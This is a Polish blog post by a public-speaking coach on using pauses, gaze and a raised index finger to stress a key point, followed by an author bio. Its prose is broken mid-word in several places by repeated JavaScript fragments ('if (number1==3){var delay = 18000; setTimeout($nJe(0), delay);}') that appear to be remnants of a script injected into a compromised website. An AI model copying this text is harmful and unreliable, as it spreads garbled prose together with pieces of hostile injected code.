Mowa ciała – jak zaznaczyć nasz najważniejszy komunikat

palec1W poprzednim artykule pisałem jak stać i co zrobić z rękoma. Pozostała odpowiedź na jedno pytanie z poprzedniego wpisu: jak podkreślać nasze najważniejsze komunikaty.

Gdy zamierasz powiedzieć coś szczególnie, Twoim zdaniem, ważnego po pierwsze możesz zaakcendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pauzą. Przerwij mówienie na 3-4 sekundy zawieszając głos. Gwarantuję, że 99 procent osób w sali zainteresuje się tym co się stało a raczej nie stało, bo jest cicho 😉

Przechodząc do wypowiedzenia najważniejszej kwestii – np. koronnego argumentu, podejdź w stronę widowni – spójrz ludziom w oczy, unieś delikatnie jedną rękę do góry z wyciągniętym ku górze palcem wskazującym (ale nie tak jak nadgorliwy uczeń zgłaszający się do odpowiedzi – dłoń nie powinna być wyżej od głowy) i… powiedz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to co masz do powiedzenia.

Następnie, znowu zamilknij na 3-4 sekundy. Daj Twojej widowni znać, że ma zastanowić się nad tym co powiedziałeś, że jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to szczególnie ważne. Tak ważne, że dajesz jej czas na zastanowienie.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply